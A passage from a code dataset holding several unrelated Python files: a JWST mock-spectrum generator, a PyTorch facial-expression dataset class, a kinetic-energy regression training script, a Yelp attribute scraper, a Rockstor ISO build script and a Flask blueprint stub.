os.path.exists(args.output_folder)\n hfile = args.spectrum_file\n\n for iobj in range(args.nobj):\n\n inputs, z = build_input(iobj, args)\n # Produce a mock spectrum for extended and point source,\n # for each of the filter/grating configurations\n for exp in exposureDict.keys():\n for filt in exposureDict[exp].keys():\n try:\n report = sn_user_spec(inputs, disperser=filterDict[filt],\n filt=filt,\n ngroup=exposureDict[exp][filt]['ngroup'],\n nint=exposureDict[exp][filt]['nint'],\n nexp=exposureDict[exp][filt]['nexp'])\n except:\n print(\"Could not generate pandeia report for {}\".format(iobj))\n continue\n snr = report['1d']['sn'][1]\n spec = report['1d']['target'][1]\n unc = spec / snr\n noise = np.random.normal(0, np.abs(unc))\n noisy_spectrum = spec + noise\n\n outputDict = OrderedDict()\n outputDict['wl'] = report['1d']['extracted_flux'][0]\n outputDict['fnu'] = noisy_spectrum\n outputDict['fnu_err'] = unc\n outputDict['sn'] = snr\n outputDict['fnu_noiseless'] = spec\n\n # Checking for S/N around Halpha or OIII\n snwl = report['1d']['sn'][0]\n tempIdx = np.where((snwl >= 0.6450 * (1 + z)) &\n (snwl <= 0.6650 * (1 + z)))[0]\n #print(tempIdx)\n if len(tempIdx) == 0: # use region around OII 3727\n print(0.6450 * (1 + z), 0.3727 * (1 + z))\n tempIdx = np.where((snwl >= 0.3600 * (1 + z)) &\n (snwl <= 0.3800 * (1 + z)))[0]\n print(tempIdx)\n\n # Write spectrum if S/N > 3\n sn = np.max(report['1d']['sn'][1][tempIdx])\n print(iobj, sn)\n\n if filt == \"clear\":\n tag = \"{}_{}\".format(exp, \"R100\")\n else:\n tag = \"{}_{}\".format(exp, \"R1000\")\n\n if args.use_sizes:\n tag += \"_withSizes\"\n\n # Write to h5py\n if hfile != \"\":\n with h5py.File(hfile, \"r+\") as hcat:\n try:\n group = hcat[str(iobj)].create_group(tag)\n except(ValueError, NameError):\n del hcat[str(iobj)][tag]\n group = hcat[str(iobj)].create_group(tag)\n group.attrs[\"snr_line\"] = sn\n group.attrs[\"filter\"] = filt\n group.attrs[\"grating\"] = filterDict[filt]\n group.attrs[\"wave_units\"] = \"micron\"\n group.attrs[\"flux_units\"] = \"mJy\"\n for k, v in outputDict.items():\n d = group.create_dataset(k, data=v)\n\n if sn < 3:\n pass\n elif args.write_fits_spectrum:\n folder = os.path.join(args.output_folder, tag)\n os.makedirs(folder, exist_ok=True)\n #idStr = \"{:04.0f}\".format(int(inputs[\"ID\"]))\n idStr = \"{:.0f}\".format(int(inputs[\"ID\"]))\n outName = idStr+'_'+filt+'_'+filterDict[filt]\n if args.use_sizes:\n outName += '_extended.fits'\n outputFile = os.path.join(folder, outName)\n print(outputFile)\n outputTable = Table(outputDict)\n outputTable.write(outputFile, overwrite=True)\n","repo_name":"bd-j/jades_sed","sub_path":"scripts/pandeia/fsps_output_to_pandeia.py","file_name":"fsps_output_to_pandeia.py","file_ext":"py","file_size_in_byte":9612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21388807876","text":"import os\nimport pandas as pd\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader, random_split\nfrom torchvision import transforms\nfrom tqdm import tqdm\nimport h5py\n\n\n\nclass FER_CKPLUS_Dataset(Dataset):\n def __init__(self, img_dir, transform=None, h5_path=None, contour=False, **kargs):\n '''\n Pytorch Dataset class\n params:-\n img_dir : the directory of the images (root image dir)\n transform: pytorch transformation over the data\n h5_path : used for saving / reading dataset from h5 file\n contour : if enabled, contours generated by deformable model will be combined with images\n return :-\n image, labels\n '''\n # base transform, transforms passed by parameter will be append to the end of list\n transform_list = [\n transforms.ToTensor(),\n ]\n if transform:\n transform_list.extend(transform)\n transform_list.extend([\n transforms.Normalize((0.5,),(0.5,)),\n ])\n \n self.transform = transforms.Compose(transform_list)\n\n self.label_names = {\n # fer_ck_plus_kdef & CK_PLUS_256\n \"anger\": 0,\n \"disgust\": 1,\n \"fear\": 2,\n \"happiness\": 3,\n \"sadness\": 4,\n \"surprise\": 5,\n \"neutrality\": 6,\n # CK_PLUS (48x48) doesn't seem to find neutral in these data\n \"happy\" : 3,\n \"contempt\": 6,\n }\n\n self.num_label_names = {\n \"0\": 0,\n \"1\": 1,\n \"2\": 2,\n \"3\": 3,\n \"4\": 4,\n \"5\": 5,\n \"6\": 6\n }\n # either read from h5 file or read from image subdirectories\n if h5_path:\n self.read_h5(filepath=h5_path)\n\n else:\n self.imgs = []\n self.labels = []\n self.contours = []\n # read all subdirectories\n dirs = os.listdir(img_dir)\n for dir in dirs:\n print(f\"Reading from directory: {dir}\")\n if dir in self.label_names:\n curr_label = self.label_names[dir]\n elif dir in self.num_label_names:\n curr_label = self.num_label_names[dir]\n else:\n continue\n for file in tqdm(os.listdir(img_dir + \"/\" + dir), desc=f\"Loading {dir}\"):\n# # filename, ext = file.split(\".\")\n# contour_filepath = os.path.join(img_dir, dir, file)\n# img_filepath = os.path.join(img_dir, dir, file[:-11], \".png\")\n\n# # reading image and label\n# with Image.open(img_filepath) as img:\n# self.imgs.append(np.array(img))\n# self.labels.append(curr_label)\n# # if contour:\n# # try:\n# # reading corresponding contours\n# with Image.open(contour_filepath) as contour:\n# self.contours.append(np.array(contour))\n# # except:\n# # raise Exception(f\"Reading contour enabled, but contour file: {contour_filepath} not present.\")\n# # filename, ext = file.split(\".\")\n filename, ext = file.split(\".\")\n img_filepath = os.path.join(img_dir, dir, file)\n\n with Image.open(img_filepath) as img:\n if filename.endswith(\"_result\"):\n # reading contours\n self.contours.append(np.array(img))\n else:\n # reading image and label\n self.imgs.append(np.array(img))\n self.labels.append(curr_label)\n\n\n def show(self):\n pass\n\n def save_h5(self, savepath=\"./data/fer_ckplus.h5\"):\n \"\"\"\n save train/val dataset as single h5 file\n \"\"\"\n print(f\"Saving h5 file to: {savepath}\")\n with h5py.File(savepath, 'w') as hf:\n hf.create_dataset(\"imgs\", data=self.imgs)\n hf.create_dataset(\"labels\", data=self.labels)\n hf.create_dataset(\"contours\", data=self.contours)\n\n def read_h5(self, filepath=\"./data/fer_ckplus.h5\"):\n \"\"\"\n read h5 file into self.imgs and self.labels\n \"\"\"\n print(f\"Reading h5 file from: {filepath}\")\n with h5py.File(filepath, 'r') as hf:\n self.imgs = hf['imgs'][:]\n self.labels = hf['labels'][:]\n self.contours = hf['contours'][:]\n\n def __len__(self):\n return len(self.labels)\n\n def __getitem__(self, idx):\n img = self.imgs[idx]\n contour = self.contours[idx]\n label = self.labels[idx]\n img = self.transform(img)\n contour = self.transform(contour)\n # height = img.shape[0]\n # width = img.shape[1]\n # combine = np.zeros((height, width, 2))\n # combine[:,:,0]=img\n # combine[:,:,1]= contour\n combined = torch.concat((img, contour))\n return combined, label \n\n \n\n# class FER_CKPLUS_Dataloader:\n# def __init__(self, data_dir=\"data/fer_ckplus_kdef/\", batchsize=128, num_workers=4, resize=None, augment=True, h5_path=None, train_val_split=0.9, transform=None):\n# \"\"\"\n# generate train loader\n# \"\"\" \n# ds = FER_CKPLUS_Dataset(data_dir, transform=transform, resize=resize , h5_path=h5_path)\n# train_num = int(len(ds)*train_val_split) # default=0.9\n# val_num = len(ds) - train_num\n# train_ds, val_ds = random_split(ds, [train_num, val_num])\n# # not augment validation set\n# val_ds.is_train = False\n\n# # train loader\n# self.train_len = len(train_ds)\n# self.train_loader = DataLoader(\n# train_ds,\n# batch_size = batchsize,\n# shuffle = True,\n# num_workers = num_workers\n# )\n\n# # validation loader\n# self.val_len = len(val_ds)\n# self.val_loader = DataLoader(\n# val_ds,\n# batch_size = batchsize,\n# shuffle = True,\n# num_workers = num_workers\n# )\n\n\n\n\n\n\nif __name__ == \"__main__\":\n # dl = FER_CKPLUS_Dataloader(\"data/CK_PLUS_CONTOUR\")\n # test_loader = DataLoader(test_dataset,batch_size=128,shuffle = True,num_workers=0, h5_path=\"./data/fer_ckplus.h5\")\n dataset = FER_CKPLUS_Dataset(\"data/CK_PLUS_CONTOUR\")\n dataset.save_h5(savepath=\"./data/CK_PLUS_CONTOUR/CK_PLUS_CONTOUR.h5\")\n","repo_name":"bznick98/learning-emotion-with-deformable-model","sub_path":"datasets/fer_ckplus_kdef.py","file_name":"fer_ckplus_kdef.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27876972283","text":"from datetime import date\nfrom datetime import datetime\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.preprocessing import StandardScaler\nfrom torchvision import datasets, transforms\n\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport plotly.express as px\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport tqdm\n\ndef save_my_work(model, logfile, xdata_name, opt, N, Bsize, learningRate, epoch, second_time, best_mse, mse, loss, init_time):\n model_save_time = str(int(time.time()))\n model_file_name = '/content/drive/MyDrive/0_318lab/SCMP_ML/'+'model' + model_save_time + '.pt'\n torch.save(model, model_file_name )\n print(\n datetime.now(),\n 'data:', xdata_name,\n file=logfile\n )\n print(\n ', layer_dim_list:', dim_list,\n 'activateion:', act,\n ', optimizer:', opt,\n ', n_of_data:',N,\n ', Bsize:', Bsize ,\n ', learningRate:', learningRate ,\n file=logfile\n )\n print(\n ', epoch: %5d' % epoch,\n ', passed_time: %.3f' % ( ( ( time.time()-second_time ) ) / 60 ), 'm',\n\n \", minimum_RMSE: %.2f\" % (best_mse),\n ', test_loss: %2f' % (mse),\n ', train_loss: %2f' % (loss),\n ', passed_time_accum: %.3f' % ( ( init_time - time.time() ) / 60 ), 'm',\n file=logfile\n )\n plt.plot(history)\n plt.yscale('log')\n plt.title('test_loss')\n plt.savefig(\n model_file_name[0:-3] + 'test_loss' + '.pdf',\n format=\"pdf\",\n bbox_inches=\"tight\"\n )\n plt.show()\n\n plt.plot(history_train)\n plt.title('train_loss')\n plt.yscale('log')\n plt.savefig(\n model_file_name[0:-3] + 'train_loss' + '.pdf',\n format=\"pdf\",\n bbox_inches=\"tight\"\n )\n plt.show()\n \n \ndef print_progress(epoch, mse, loss, second_time):\n print('epoch: %5d' % epoch,\n ', test_loss: {:7.1f}'.format(mse),\n ', train_loss: {:7.1f}'.format(loss),\n ', est_time: {:5.1f}'.format(( ( ( time.time()-second_time ) ) / 60 )), 'min,',\n 'average_time: {:.2f}'.format( ( time.time()-second_time )/(epoch+1)), 's'\n )\n \nN, D_in, D_out = 10000, 2, 1\n\nxdata_name = 'data/KEdataX_N_' + str(N) + '_Interval_10_1691050560.pt'\nydata_name = 'data/KEdataY_N_' + str(N) + '_Interval_10_1691050560.pt'\nX = torch.load(xdata_name)\ny = torch.load(ydata_name)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.7, shuffle=False)\n\n\n#default\n\n\"\"\"\ntry\n\nactivateion: Softplus , optimizer: Adam , n_of_data: 10000 , Bsize: 100 , learningRate: 0.0005 , minimum_RMSE: 27.47 , epoch: 3660 , test_loss: 595.456665 , train_loss: 14.215258 , layer_dim_list: [2, 20, 20, 20, 20, 1] , passed_time: 5.000 m , passed_time: -160.696 s\n\nactivateion: Softplus , optimizer: Adam , n_of_data: 10000 , Bsize: 100 , learningRate: 5e-05 , minimum_RMSE: 252.92 , epoch: 3668 , test_loss: 256.572418 , train_loss: 184.996445 , layer_dim_list: [2, 20, 20, 20, 20, 1] , passed_time: 5.000 m , passed_time: -170.736 s\n\nactivateion: Softplus , optimizer: Adam , n_of_data: 10000 , Bsize: 10 , learningRate: 0.005 , minimum_RMSE: 77.75 , epoch: 386 , test_loss: 3821.791748 , train_loss: 5.220962 , layer_dim_list: [2, 20, 20, 20, 20, 1] , passed_time: 5.010 m , passed_time: -30.134 s\n\nactivateion: Softplus , optimizer: Adam , n_of_data: 10000 , Bsize: 500 , learningRate: 0.001 , minimum_RMSE: 22.67 , epoch: 13813 , test_loss: 15479.684570 , train_loss: 1186.494629 , layer_dim_list: [2, 20, 20, 20, 20, 1] , passed_time: 5.000 m , passed_time: -205.868 s\n\n\"\"\"\n# for learningRate in range(10): #\n\n\ndim_list = [2, 20, 20, 20, 20, 1]\n\n\nf = open(\"/content/drive/MyDrive/0_318lab/SCMP_ML/log.txt\", \"a\")\n#If data is less complex and is having fewer dimensions or features then neural networks with 1 to 2 hidden layers would work.\n# If data is having large dimensions or features then to get an optimum solution, 3 to 5 hidden layers can be used.\n\ninit_time = time.time()\nprint('start')\nfor act in [\n # 'LeakyReLU',\n # 'LogSigmoid',\n 'Softplus']:\n\n for opt in [\n # 'Adadelta',\n # 'Adagrad',\n 'Adam',\n # 'AdamW',\n # 'SparseAdam',\n # 'Adamax',\n # 'ASGD',\n # 'LBFGS',\n # 'NAdam',\n # 'RAdam',\n # 'RMSprop',\n # 'Rprop',\n # 'SGD'\n ]:\n try:\n # for Bsize in [ 10, 50, 100, 500]:\n # for Bsize in [ 10, 100, 1000]:\n for batch_size in [ 10]:\n\n # for learningRate in [ 1e-1, 1e-2, 1e-3, 1e-4,1e-5, 1e-6, ]:\n # for learningRate in [ 1e-1, 5e-1, 1e-2, 5e-2, 1e-3, 5e-3, 1e-4, 5e-4, 1e-5, 5e-5, 1e-6, 5e-6, ]:\n for learningRate in [ 0.005 ]:\n\n make_model = 'model = nn.Sequential('\n for layer_num in range( len(dim_list) - 1 ):\n if layer_num == len(dim_list) - 2:\n make_model = make_model + 'nn.Linear(dim_list[' + str(layer_num) + '], dim_list[' + str(layer_num+1) + ']) )'\n else:\n # make_model = make_model + 'nn.Linear(dim_list[' + str(layer_num) + '], dim_list[' + str(layer_num+1) + ']), nn.LeakyReLU(),'\n make_model = make_model + 'nn.Linear(dim_list[' + str(layer_num) + '], dim_list[' + str(layer_num+1) + ']), nn.' + act + '(),'\n\n\n exec(make_model)\n\n exec('optimizer = optim.' + opt + '(model.parameters(), lr=learningRate )')\n\n batch_start = torch.arange(0, len(X_train), batch_size)\n\n # Hold the best model\n best_mse = np.inf # init to infinity\n best_weights = None\n history = []\n history_train = []\n\n\n # for epoch in range(n_epochs):\n second_time = time.time()\n\n epoch = 0\n len_batch = len(X_train)\n while(1):\n\n model.train()\n\n for start in range(0,len_batch, batch_size):\n\n X_batch = X_train[start:start+batch_size] # 두번째 값이 길이를 초과해도 오류안뜨고 그냥 시작부터 끝까지 출력해주는 착한친구.\n y_batch = y_train[start:start+batch_size]\n # forward pass\n y_pred = model(X_batch).squeeze()\n\n before_loss = torch.mean( (y_pred/y_batch-1)**2 + (y_batch/y_pred-1)**2 + (y_pred-y_batch)**2 )\n\n loss = before_loss**(1/2)\n\n # backward pass\n optimizer.zero_grad()\n loss.backward()\n\n # update weights\n optimizer.step()\n\n loss = float(loss)\n\n history_train.append(loss)\n\n model.eval()\n y_pred = model(X_test).squeeze()\n #print(y_pred)\n\n before_loss = torch.mean( (y_pred/y_test-1)**2 + (y_test/y_pred-1)**2 + (y_pred-y_test)**2 )\n\n mse = before_loss**(1/2)\n\n mse = float(mse)\n\n history.append(mse)\n if mse < best_mse:\n best_mse = mse\n best_weights = copy.deepcopy(model.state_dict())\n\n\n if epoch % 100 == 0:\n # print('epoch: %5d' % epoch, 'test_loss: %.2f' % (mse), 'train_loss: %.2f' % (loss), 'est_time: %.2f' % (( ( epoch_time ) / (epoch+1) ) / 60 * (n_epochs-epoch) ) ,'min', \"epoch_time:\", epoch_time, 's')\n print_progress(epoch, mse, loss, second_time)\n # print('{:.6}'.format(val))\n # print(\"{:10.4f}\".format(x))\n\n # if (mse<10) or (str(mse)=='nan') or ( ( ( time.time()-second_time ) ) / 60 > 0.1 ):\n if (mse<10) or (str(mse)=='nan'):\n print_progress(epoch, mse, loss, second_time)\n break\n epoch = epoch + 1\n\n # restore model and return best accuracy\n model.load_state_dict(best_weights)\n # print(\"MSE: %.2f\" % best_mse)\n # print(\"RMSE: %.2f\" % np.sqrt(best_mse))\n save_my_work(model, f, xdata_name, opt, N, batch_size, learningRate, epoch, second_time, best_mse, mse, loss, init_time)\n\n print('finish--------------------------------------------------------------------------------------------------------------------------------------------------------')\n print('')\n\n except:\n # os.mkdir('/content/drive/MyDrive/0_318lab/SCMP_ML/')\n save_my_work(model, f, xdata_name, opt, N, batch_size, learningRate, epoch, second_time, best_mse, mse, loss, init_time)\n\nf.close()\nprint('all done')\n# ----------------------------------------------------------------------------------------------------\n# ----------------------------------------------------------------------------------------------------","repo_name":"ktikok/SCMP_ML","sub_path":".ipynb_checkpoints/predictingKineticE-checkpoint.py","file_name":"predictingKineticE-checkpoint.py","file_ext":"py","file_size_in_byte":9967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12629476704","text":"import os\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import text\n\nload_dotenv()\n\nDATABASE_USERNAME = os.environ[\"DATABASE_USERNAME\"]\nDATABASE_PASSWORD = os.environ[\"DATABASE_PASSWORD\"]\nDATABASE_HOST = os.environ[\"DATABASE_HOST\"]\nDATABASE_PORT = os.environ[\"DATABASE_PORT\"]\nDATABASE_DATABASE = os.environ[\"DATABASE_DATABASE\"]\n\nSQLALCHEMY_DATABASE_URL = f\"postgresql://{DATABASE_USERNAME}:{DATABASE_PASSWORD}@{DATABASE_HOST}:{DATABASE_PORT}/{DATABASE_DATABASE}\"\n\nengine = create_engine(SQLALCHEMY_DATABASE_URL)\n\nsql = '''\n SELECT * FROM business;\n'''\nwith engine.connect().execution_options(autocommit=True) as conn:\n query = conn.execute(text(sql)) \ndf = pd.DataFrame(query.fetchall())\n\n\n\nrestaurant_attributes = []\n\nfor i in range(len(df)):\n response = requests.get(str(df[\"business_info\"][i][\"url\"]))\n soup = BeautifulSoup(response.content, \"lxml\")\n\n attributes = []\n for ii in range(0,4):\n try:\n attr = soup.find(\"yelp-react-root\").find(\"main\").find_all(\"span\", {\"class\": \"css-1p9ibgf\", \"data-font-weight\": \"semibold\"})[ii].decode_contents()\n if attr.startswith('\" % sys.argv[0])\n build_dir = sys.argv[1]\n print(\"Using %s as the iso build directory\" % build_dir)\n\n pkg_dir = '%s/Packages' % build_dir\n if (not os.path.isdir(pkg_dir)):\n sys.exit(\"Packages directory %s does not exist.\" % rpm_dir)\n new_pkg_dir = '%s/newrpms' % build_dir\n os.system(\"/usr/bin/mkdir -p %s\" % new_pkg_dir)\n\n install_deps()\n download_new_pkgs(pkg_dir, new_pkg_dir)\n rm_686_pkgs(new_pkg_dir)\n print (\"All i686 packages removed\")\n ttbl = '%s/TRANS.TBL' % pkg_dir\n shutil.copy(ttbl, new_pkg_dir)\n print (\"copied %s to %s\" % (ttbl, new_pkg_dir))\n bkp_dest = '/tmp/Packages'\n if (os.path.isdir(bkp_dest)):\n os.system('/usr/bin/rm -rf %s' % bkp_dest)\n print ('Removed %s' % bkp_dest)\n shutil.move(pkg_dir, bkp_dest)\n print (\"%s moved to %s\" % (pkg_dir, bkp_dest))\n shutil.move(new_pkg_dir, pkg_dir)\n print (\"%s moved to %s\" % (new_pkg_dir, pkg_dir))\n create_repo(build_dir)\n mkiso(build_dir)\n\nif __name__ == '__main__':\n main()\n","repo_name":"magicalyak/rockstor-iso","sub_path":"make_iso.py","file_name":"make_iso.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"33390549540","text":"from apps.home import blueprint\nfrom flask import Flask, render_template, request\nfrom flask_login import login_required\nfrom jinja2 import TemplateNotFound\n\napp = Flask(__name__)\napp.register_blueprint(blueprint)\n\n@blueprint.route('/index')\n@login_required\ndef index():\n\n return render_template('home/index.html', segment='index')\n\n\n@blueprint.route('/